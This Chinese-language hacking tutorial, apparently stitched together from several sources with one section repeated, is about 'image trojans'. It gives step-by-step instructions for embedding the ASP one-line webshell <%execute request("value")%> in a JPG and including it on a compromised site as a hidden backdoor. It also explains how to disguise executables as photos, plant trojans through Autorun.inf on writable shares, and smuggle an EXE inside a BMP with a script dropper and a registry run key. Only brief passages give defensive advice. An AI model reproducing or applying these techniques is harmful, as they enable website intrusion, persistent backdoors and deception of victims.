黑客技巧之利用图片做木马应用完全解析

图片木马制作的三种方法Copy命令制作1.asp内容：打开cmd，数据一下命令：此时打开两个jpg文件，相比：且打开2.jpg可以像1.jpg一样显示图像。

把以下代码放入目标网站，即可按asp执行。

<% #include files=”2.jpg”%>Uedit32（转载）：本制作来自于：雪糕。

我们通常在得到webshell之后都想给自己留个后门，等下次或以后有用得到的时候再进来看看。

但如果直接加入一句话木马<%execute request("value")%>到asp文件中时，在该页面上就会有类似如下的错误：Microsoft VBScript 运行时错误错误'800a000d'类型不匹配: 'execute'/news1/show.asp，行 3所以我们就可以开动脑筋了，使用插入一句话木马的图片做我们的后门。

而且我们如果有足够的权限的话（希望网站中的文件可写），就直接把网站原有的图片变成后门，然后在那个asp文件中加入调用图片后门的代码：<!--#include file="图片后门地址"-->这样就没有上面的“类型不匹配: 'execute'”错误了，而且也更好的隐藏了我们的后门。

新挑战始终会伴着新事物的出现而出现，当我们直接将我们的一句话木马的asp文件改成jpg 或gif文件的时候，这个图片文件是打不开的，这又容易被管理员发现。

然后我们就又开始思考并寻找新的方法：制作可以显示图片内容的图片格式后门。

制作步骤：一、前期准备材料：1.一张图片：1.jpg2.一句话木马服务器端代码：<%execute request("value")%>（其他的一句话也行）3.一句Script标签：<SCRIPT RUNAT=SERVER LANGUAGE=JA V ASCRIPT>一句话木马服务器端代码</SCRIPT>4. 调用图片后门代码：<!--#include file="图片地址"-->工具：UltraEdit二、开始制作：1.使用UltraEdit打开1.jpg文件，然后按CTRL +F 进行查找图片中的“<%”和“%>”其中<%的十六进制代码是3E 25，那么%>就应该是25 3E，但是我们只把25改成00；之后我们在新建一个文本编辑窗口，将我们的script标签代码<SCRIPT RUNAT=SERVER LANGUAGE=JA V ASCRIPT><%execute request("value")%></SCRIPT>复制进去，然后点击右键选择十六进制编辑命令，这样会跳转到十六进制数据窗口，复制所有的十六进制的数据，粘贴到1.jpg的十六进制编辑窗口的最下面，说明：为什么要粘贴到最下面？假设你把srcipt标签的十六进制代码粘贴到中间的话，就会破坏图片的完整性，那样下面的图片就看不到了，但是插入的一句话代码还是起作用的。

木马攻击原理一、什么是木马攻击？木马（Trojan horse）是一种常见的网络攻击手段，指的是通过在正常的程序或文件中隐藏恶意代码，以实现攻击者的恶意目的。

木马攻击可以隐藏于各种类型的文件中，例如图片、文档、音乐等等，这样一旦用户打开了这些文件，系统就会被感染，攻击者就能够获得对系统的控制权。

二、木马攻击的原理木马攻击的原理可以分为几个步骤：1. 伪装攻击者首先需要伪装木马程序，使其看起来像是一个合法的文件或程序。

他们会使用各种技术手段，例如改变文件的后缀名、隐藏文件扩展名或者伪装成系统程序，以躲避用户的警觉。

2. 传播一旦木马程序被伪装成功，攻击者需要将其传播给目标用户。

他们可以通过电子邮件、社交媒体、广告等途径将木马程序发送给用户。

一旦用户下载并打开了木马程序，系统就会被感染。

3. 植入一旦木马程序被用户打开，恶意代码就会被植入到系统中。

这些代码通常会利用系统的漏洞或者弱点，以获取系统的权限。

一旦攻击者获得了系统的控制权，他们就能够执行各种恶意操作，例如窃取用户的隐私信息、占用系统资源、控制系统行为等等。

4. 控制与劫持一旦木马程序在目标系统中植入成功，攻击者就能够远程控制系统，执行各种恶意操作。

他们可以通过远程命令控制（Remote Command Execution）来操纵系统行为，例如上传下载文件、修改系统配置、操纵网络连接等等。

此外，攻击者还可以劫持用户的网络连接，以拦截用户的通信数据，窃取敏感信息。

三、木马攻击的防范措施木马攻击带来的危害是巨大的，为了保障系统的安全，我们需要采取以下防范措施：1. 使用安全的密码使用强密码是防止木马攻击的第一步。

确保密码的复杂性，并不断更换密码，避免使用容易猜测的密码。

2. 安装防火墙和杀毒软件安装防火墙和杀毒软件可以有效阻止木马程序的入侵。

这些软件可以检测系统中的可疑活动，并及时阻止其执行。

3. 及时打补丁保持系统和软件的更新也非常重要。

及时打补丁可以修复系统中的漏洞和弱点，从而减少被木马攻击的概率。

黑客是如何骗取你执行木马的如今大多数上网的朋友警惕性都很高，想骗取他们执行木马是件很困难的事，因为木马出现这么久，木马两个字听得人们耳朵都长出了老茧，可说是谈"马"色变，即使不是电脑高手都知道，一见到是exe 文件便不会轻易"招惹"它，因而中标的机会也就相对减少了。

对于此，黑客们是不会甘于寂寞的，在黑客的世界里挑战与刺激才是他们趋之若婺的。

1、冒充为图像文件首先，黑客最常使用骗别人执行木马的方法，就是将特洛伊木马说成为图像文件，比如说是照片等，应该说这是一个最不合逻辑的方法，但却是最多人中招的方法，有效而又实用。

只要入侵者扮成美眉及更改服务器程序的文件名(例如sam.exe )为"类似"图像文件的名称，再假装传送照片给受害者，受害者就会立刻执行它。

为甚么说这是一个不合逻辑的方法呢？图像文件的扩展名根本就不可能是exe，而木马程序的扩展名基本上又必定是exe ，明眼人一看就会知道有问题，多数人在接收时一看见是exe文件，便不会接收了，那有什么方法呢? 其实方法很简单，他只要把文件名改变，例如把"sam.exe" 更改为"sam.jpg" ，那么在传送时，对方只会看见sam.jpg 了，而到达对方电脑时，因为windows 默认值是不显示扩展名的，所以很多人都不会注意到扩展名这个问题，而恰好你的计算机又是设定为隐藏扩展名的话，那么你看到的只是sam.jpg 了，受骗也就在所难免了!还有一个问题就是，木马本身是没有图标的，而在电脑中它会显示一个windows 预设的图标，别人一看便会知道了！但入侵者还是有办法的，这就是给文件换个"马甲"，即修改文件图标。

修改文件图标的方法如下:1 . 比如到 下载一个名为IconForge 的软件，再进行安装。

2 . 执行程序，按下File > Open3 . 在File Type 选择exe 类4 . 在File > Open 中载入预先制作好的图标( 可以用绘图软件或专门制作icon 的软件制作，也可以在网上找找) 。

图片木马制作的三种方法Copy命令制作1.asp内容：打开cmd，数据一下命令：此时打开两个jpg文件，相比：且打开2.jpg可以像1.jpg一样显示图像。

把以下代码放入目标网站，即可按asp执行。

<% #include files=”2.jpg”%>Uedit32（转载）：本制作来自于：雪糕。

我们通常在得到webshell之后都想给自己留个后门，等下次或以后有用得到的时候再进来看看。

但如果直接加入一句话木马<%execute request("value")%>到asp文件中时，在该页面上就会有类似如下的错误：Microsoft VBScript 运行时错误错误'800a000d'类型不匹配: 'execute'/news1/show.asp，行 3所以我们就可以开动脑筋了，使用插入一句话木马的图片做我们的后门。

而且我们如果有足够的权限的话（希望网站中的文件可写），就直接把网站原有的图片变成后门，然后在那个asp文件中加入调用图片后门的代码：<!--#include file="图片后门地址"-->这样就没有上面的“类型不匹配: 'execute'”错误了，而且也更好的隐藏了我们的后门。

新挑战始终会伴着新事物的出现而出现，当我们直接将我们的一句话木马的asp文件改成jpg 或gif文件的时候，这个图片文件是打不开的，这又容易被管理员发现。

然后我们就又开始思考并寻找新的方法：制作可以显示图片内容的图片格式后门。

制作步骤：一、前期准备材料：1.一张图片：1.jpg2.一句话木马服务器端代码：<%execute request("value")%>（其他的一句话也行）3.一句Script标签：<SCRIPT RUNAT=SERVER LANGUAGE=JA V ASCRIPT>一句话木马服务器端代码</SCRIPT>4. 调用图片后门代码：<!--#include file="图片地址"-->工具：UltraEdit二、开始制作：1.使用UltraEdit打开1.jpg文件，然后按CTRL +F 进行查找图片中的“<%”和“%>”其中<%的十六进制代码是3E 25，那么%>就应该是25 3E，但是我们只把25改成00；之后我们在新建一个文本编辑窗口，将我们的script标签代码<SCRIPT RUNAT=SERVER LANGUAGE=JA V ASCRIPT><%execute request("value")%></SCRIPT>复制进去，然后点击右键选择十六进制编辑命令，这样会跳转到十六进制数据窗口，复制所有的十六进制的数据，粘贴到1.jpg的十六进制编辑窗口的最下面，说明：为什么要粘贴到最下面？假设你把srcipt标签的十六进制代码粘贴到中间的话，就会破坏图片的完整性，那样下面的图片就看不到了，但是插入的一句话代码还是起作用的。

巧用技巧揪出图片背后的木马病毒导读:木马病毒属于病毒的一类，主要是进行盗取账号密码信息、远程控制用户电脑、破坏操作系统等操作。

并且，为了防止杀毒软件对它的查杀，通常具有很强的隐蔽性和反侦察性。

多数木马病毒感染后，首先试图强行关闭杀毒软件，然后才开始盗取账号，有的木马病毒甚至会将国内外主流杀毒软件先各个击破。

最近一段时间，从各大杀毒软件厂商发布的病毒报告中可以看到，木马病毒目前在互联网上泛滥情况十分严重，并且已经形成完整的病毒产业链。

它是如何入侵电脑?作为普通网民又应如何防范?有许多的用户发现自己的电脑有问题，但却找不出原因，是中了木马不假，但就是找不出是哪的问题，后来监测到有数据在上传时，在图片中找到了藏于其中的木马病毒，也终于把它揪出来了。

看一下具体内容：攻击者利用微软GDIplus安全漏洞将木马藏于图片中，注意是藏而不是捆绑，这个不同于以前把木马伪装成图片，引诱网民去点击，而是实实在在的图片变成了木马。

受微软GDIplus安全漏洞影响，几乎所有浏览器、即时聊天工具、Office 程序以及看图软件等都可能成为木马传播的渠道。

只要通过浏览器浏览、看图软件打开、甚至是QQ、MSN、电子邮件、Office文档里查看这些图片，就会中招!管你是一个QQ表情还是一个有着上万个层的PNG图片，看了就木马你!这个安全漏洞就是微软GDIplus图片漏洞，堪称是微软有史以来最大的安全漏洞。

GDIplus是一种图形设备接口，能够为应用程序和程序员提供二维矢量图形、映像和版式。

GdiPlus.dll通过基于类的API提供对各种图形方式的访问。

它在解析特制的BMP文件时存在整数溢出漏洞，利用此漏洞的攻击者可完全控制系统，可通过这个漏洞安装更多的木马程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。

这个GDIplus漏洞非常严重，类似以前的光标漏洞和wmf 漏洞，但是涉及范围广，几乎涵盖了所有的图形格式。

了解了以上的问题，电脑用户就要慎重对待自己收到的图片了，一定要先杀一杀病毒再打开，以防中招，但这个问题也是可以解决的，因为微软GDIplus安全漏洞的专门补丁也已出现了，只要下载运行就把问题化险为夷了。

木马采用的伪装方法1. 修改图标木马服务端所用的图标也是有讲究的，木马经常故意伪装成了XT.HTML等你可能认为对系统没有多少危害的文件图标，这样很容易诱惑你把它打开。

看看，木马是不是很狡猾?2. 捆绑文件这种伪装手段是将木马捆绑到一个安装程序上，当安装程序运行时，木马在用户毫无察觉的情况下，偷偷地进入了系统。

被捆绑的文件一般是可执行文件（即EXE COM一类的文件）。

3. 出错显示有一定木马知识的人部知道，如果打开一个文件，没有任何反应，这很可能就是个木马程序。

木马的设计者也意识到了这个缺陷，所以已经有木马提供了一个叫做出错显示的功能。

当服务端用户打开木马程序时，会弹出一个错误提示框（这当然是假的），错误内容可自由定义，大多会定制成一些诸如" 文件已破坏，无法打开!" 之类的信息，当服务端用户信以为真时，木马却悄悄侵人了系统。

4. 自我销毁这项功能是为了弥补木马的一个缺陷。

我们知道，当服务端用户打开含有木马的文件后，木马会将自己拷贝到Windows的系统文件夹中（C;\wmdows或C:\windows'system 目录下）,一般来说，源木马文件和系统文件夹中的木马文件的大小是一样的（捆绑文件的木马除外），那么，中了木马的朋友只要在近来收到的信件和下载的软件中找到源木马文件，然后根据源木马的大小去系统文件夹找相同大小的文件，判断一下哪个是木马就行了。

而木马的自我销毁功能是指安装完木马后，源木马文件自动销毁，这样服务端用户就很难找到木马的来源，在没有查杀木马的工具帮助下。

就很难删除木马了。

5. 木马更名木马服务端程序的命名也有很大的学问。

如果不做任何修改，就使用原来的名字，谁不知道这是个木马程序呢?所以木马的命名也是千奇百怪，不过大多是改为和系统文件名差不多的名字，如果你对系统文件不够了解，那可就危险了。

例如有的木马把名字改为window.exe ，如果不告诉你这是木马的话，你敢删除吗?还有的就是更改一些后缀名，比如把dll 改为dl 等，不仔细看的，你会发现吗?木马的种类1 、破坏型惟一的功能就是破坏并且删除文件，可以自动的删除电脑上的DLL INI、EXE文件。

木马是大家网上安全的一大隐患，说是大家心中永远的痛也不为过。

对于木马采用敬而远之的态度并不是最好的方法，我们必须更多地了解其“习性”和特点，只有这样才能做到“知己知彼，百战不殆”！随着时间的推移，木马的植入方式也悄悄地发生了一定的变化，较之以往更加的隐蔽，对大家的威胁也更大，以下是笔者总结的五种最新的木马植入方式，以便大家及时防范。

方法一：利用共享和Autorun文件为了学习和工作方便，有许多学校或公司的局域网中会将硬盘共享出来。

更有甚者，竟将某些硬盘共享设为可写！这样非常危险，别人可以借此给您下木马！利用木马程序结合Autorun.inf文件就可以了。

方法是把Autorun.inf和配置好的木马服务端一起复制到对方D 盘的根目录下，这样不需对方运行木马服务端程序，只需他双击共享的磁盘图标就会使木马运行！这样作对下木马的人来说的好处显而易见，那就是大大增加了木马运行的主动性！许多人在别人给他发来可执行文件时会非常警惕，不熟悉的文件他们轻易不会运行，而这种方法就很难防范了。

下面我们简单说一下原理。

大家知道，将光盘插入光驱会自动运行，这是因为在光盘根目录下有个Autorun.inf文件，该文件可以决定是否自动运行其中的程序。

同样，如果硬盘的根目录下存在该文件，硬盘也就具有了AutoRun功能，即自动运行Autorun.inf文件中的内容。

把木马文件.exe文件以及Autorun.inf放在磁盘根目录（这里假设对方的D盘共享出来且可写），对于给您下木马的人来说，他还会修改Autorun.inf文件的属性，将该文件隐藏起来。

这样，当有人双击这个盘符，程序就运行了。

这一招对于经常双击盘符进入“我的电脑”的人威胁最大。

更进一步，利用一个.REG文件和Autorun.inf结合，还可以让你所有的硬盘都共享出去！方法二：把木马文件转换为BMP格式这是一种相对比较新颖的方式，把EXE转化成为BMP来欺骗大家。

其原理是：BMP文件的文件头有54个字节，包括长度、位数、文件大小、数据区长度。

木马常见植入方法大曝光对于给你下木马的人来说，一般不会改变硬盘的盘符图标，但他会修改Autorun.inf文件的属性，将该文件隐藏起来。

然后按F5键刷新，这样，当有人双击这个盘符，程序就运行了。

这一招对于经常双击盘符进入“我的电脑”的人最有效。

识别这种伪装植入方式的方法是，双击盘符后木马程序会运行，并且我们不能进入盘符。

4把木马文件转换为图片格式这是一种相对比较新颖的方式，把EXE转化成为BMP图片来欺骗大家。

原理：BMP文件的文件头有54个字节，包括长宽、位数、文件大小、数据区长度。

我们只要在EXE的文件头上加上这54字节，IE就会把它当成BMP文件下载下来。

改过的图片是花的，会被人看出破绽，用＜imgscr＝″xxx.bmp″higth＝″0″width＝″0″＞，把这样的标签加到网页里，就看不见图片了，也就无法发现“图片”不对劲。

IE 把图片下载到临时目录，我们需要一个JavaScript文件在对方的硬盘里写一个VBS文件，并在注册表添加启动项，利用那个VBS找到BMP，调用debug来还原EXE，最后，运行程序完成木马植入。

下一次启动时木马就运行了，无声无息非常隐蔽。

5伪装成应用程序扩展组件此类属于最难识别的特洛伊木马，也是骗术最高的木马。

特洛伊木马编写者用自己编制的特洛伊DLL替换已知的系统DLL，并对所有的函数调用进行过滤。

对于正常的调用，使用函数转发器直接转发给被替换的系统DLL，对于一些事先约定好的特殊情况，DLL会执行一些相对应的操作。

一个比较简单的方法是启动一个进程，虽然所有的操作都在DLL中完成会更加隐蔽，但是这大大增加了程序编写的难度。

实际上这样的木马大多数只是使用DLL进行监听，一旦发现控制端的连接请求就激活自身，起一个绑端口的进程进行正常的木马操作。

操作结束后关掉进程，继续进入休眠状况。

举个具体的例子，黑客们将写好的文件（例如DLL、OCX等）挂在一个十分出名的软件中，例如QQ中。